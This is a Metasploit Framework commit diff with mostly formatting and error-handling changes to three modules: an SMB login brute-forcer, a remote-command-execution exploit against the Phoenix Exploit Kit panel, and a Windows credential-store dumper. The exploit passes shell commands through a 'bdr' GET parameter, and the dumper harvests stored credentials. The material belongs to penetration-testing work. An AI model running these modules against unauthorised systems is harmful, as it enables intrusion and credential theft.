Merge branch 'master' into feature/MS-1715/rex-socket-gem

David Maloney · David Maloney · commit 4b2d6b623d30 · 2016-08-30T10:37:37.000-05:00
diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb
@@ -70,6 +70,7 @@ def run_host(ip)
     @scanner = Metasploit::Framework::LoginScanner::SMB.new(
       host: ip,
       port: rport,
+      local_port: datastore['CPORT'],
       stop_on_success: datastore['STOP_ON_SUCCESS'],
       bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
       connection_timeout: 5,
diff --git a/modules/exploits/multi/http/phoenix_exec.rb b/modules/exploits/multi/http/phoenix_exec.rb
@@ -14,22 +14,22 @@ def initialize(info={})
     super(update_info(info,
       'Name'           => 'Phoenix Exploit Kit Remote Code Execution',
       'Description'    => %q{
-        This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The
+        This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via geoip.php. The
         Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
-        presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which
-        then silently installs malware.
+        presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader,
+        silently installing malware if found.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'CrashBandicot @DosPerl', #initial discovery
-          'Jay Turla <@shipcod3>', #msf module
+          'CrashBandicot', #initial discovery by @DosPerl
+          'Jay Turla' #msf module by @shipcod3
         ],
       'References'     =>
         [
           [ 'EDB', '40047' ],
           [ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit
-          [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ],
+          [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ]
         ],
       'Privileged'     => false,
       'Payload'        =>
@@ -45,16 +45,16 @@ def initialize(info={})
       'Arch'           => ARCH_CMD,
       'Targets'        =>
         [
-          ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
-          ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
+          [ 'Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
+          [ 'Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
         ],
       'DisclosureDate' => 'Jul 01 2016',
       'DefaultTarget'  => 0))
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php']),
-      ],self.class)
+        OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php'])
+      ], self.class)
   end
 
   def check
@@ -63,7 +63,7 @@ def check
     if res && res.body.include?(test)
       return Exploit::CheckCode::Vulnerable
     end
-    return Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe
   end
 
   def exploit
@@ -72,12 +72,12 @@ def exploit
   end
 
   def http_send_command(cmd)
-    send_request_cgi({
+    send_request_cgi(
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path),
       'vars_get' => {
         'bdr' => cmd
       }
-    })
+    )
   end
 end
diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb
@@ -178,14 +178,25 @@ def get_creds
     credentials = []
     #call credenumerate to get the ptr needed
     adv32 = session.railgun.advapi32
-    ret = adv32.CredEnumerateA(nil,0,4,4)
-    p_to_arr = ret["Credentials"].unpack("V")
-    if is_86
-      count = ret["Count"]
-      arr_len = count * 4
+    begin
+      ret = adv32.CredEnumerateA(nil,0,4,4)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      print_error("This module requires WinXP or higher")
+      print_error("CredEnumerateA() failed: #{e.class} #{e}")
+      ret = nil
+    end
+    if ret.nil?
+      count = 0
+      arr_len = 0
     else
-      count = ret["Count"] & 0x00000000ffffffff
-      arr_len = count * 8
+      p_to_arr = ret["Credentials"].unpack("V")
+      if is_86
+        count = ret["Count"]
+        arr_len = count * 4
+      else
+        count = ret["Count"] & 0x00000000ffffffff
+        arr_len = count * 8
+      end
     end
 
     #tell user what's going on
